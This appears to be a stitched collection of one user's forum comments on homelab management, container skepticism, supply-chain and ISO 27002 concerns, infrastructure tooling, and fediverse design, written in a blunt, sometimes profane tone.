On an average day, I spend 0 minutes managing the homelab.

0 is the goal. Well done !

Edit: Ha! Some masochist down-voted that.

How it started : 0

Max : 0

Now : 0

Iso27002 and provenance validation goes brrrrr

You’re not alone.

The industry itself has become pointlessly layered like some origami hell. As a former OS security guy I can say it’s not in a good state with all the supply-chain risks.

At the same time, many ‘help’ articles are karma-farming ‘splogs’ of low quality and/or just slop that they’re not really useful. When something’s missing, it feels to our imposter syndrome like it’s a skills issue.

Simplify your life. Ditch and avoid anything with containers or bizarre architectures that feels too intricate. Decide what you need and run those on really reliable options. Auto patching is your friend (but choose a distro and package format where it’s atomic and rolls back easily).

You don’t need to come home only to work. This is supposed to be FUN for some of us. Don’t chase the Joneses, but just do what you want.

Once you’ve simplified, get in the habit of going outside. You’ll feel a lot better about it.

Still crutching on containers?

Comically, the organization with the worst history for virtualization now doubled-down on SAAS. This is certainly going well.

desktop client app for Linux

An app THAT DOES WHAT? You may as well be asking for “a food I can eat bite by bite”.

Still crutching on containers?

Got a version without docker?

Container crutches. Ew.

Where’s the Bazel people at?

CI compatible to GitHub actions

Ugh. More yaml?

It’s still yaml shit though.

Packer builds the terraformable/openTofuable templates to launch into the hypervisor where chef (eventually mgmtConfig) will manage them from there until they die.

All that is launched by git. Fire and forget. Updates are cronned.

There are no containers. Don’t got time to fuck about. If Systemd wasn’t an absolute embarrassment I’d not worry about updates even as much as I do, which isn’t much aside from the aforementioned cancer.

Like, what 8 letters are abbreviated between those two Ns? Are we supposed to know?

I see it’s running Ansible. That’s an obvious risk.

The writing in this article is absolutely terrible. It needs some serious clean-up before the message isn’t impaired by the medium.

I go to pixelfed to post my art and view other peoples art. that’s it. I don’t go there to read posts or what’s going on in peoples lives.

Yes but being able to do that is a design goal of the fediverse

Is it? Beause that seems really dumb.

Here’s a radical idea: sometimes, web services are built with features you don’t use. Sometimes you don’t even *value *those features. But, in cases where your preference isn’t in the majority, the decision to include those features won’t match your personal preference.

Sometimes, the ability to share and see content between different sites is even a core value.

Weird.

For more information, search “false consensus”.

You may want to learn how you can configure your own accounts on various services to manage what you see on each one. Because, to some extent, that’s a configuration option.

The installation workflow begs for supply-chain exploits. Given this and its oob install, it probably breaks iso27002 as well.

I’ll wait. NextCloud and OwnCloud both have 27002-compliant installs (the latter needs some review), so I need to stick with those.

Still container-dependent?

This. If I pay the cost in frustration and anguish and soul-searching and demanding justice from an uncaring god, I want some thing for it. I want documentation. I want my lessons learned from the post incident review. I want something I can hack into mgmtConfig to make sure nothing else will do that too.

Struggling for no payoff is the absolute worst thing.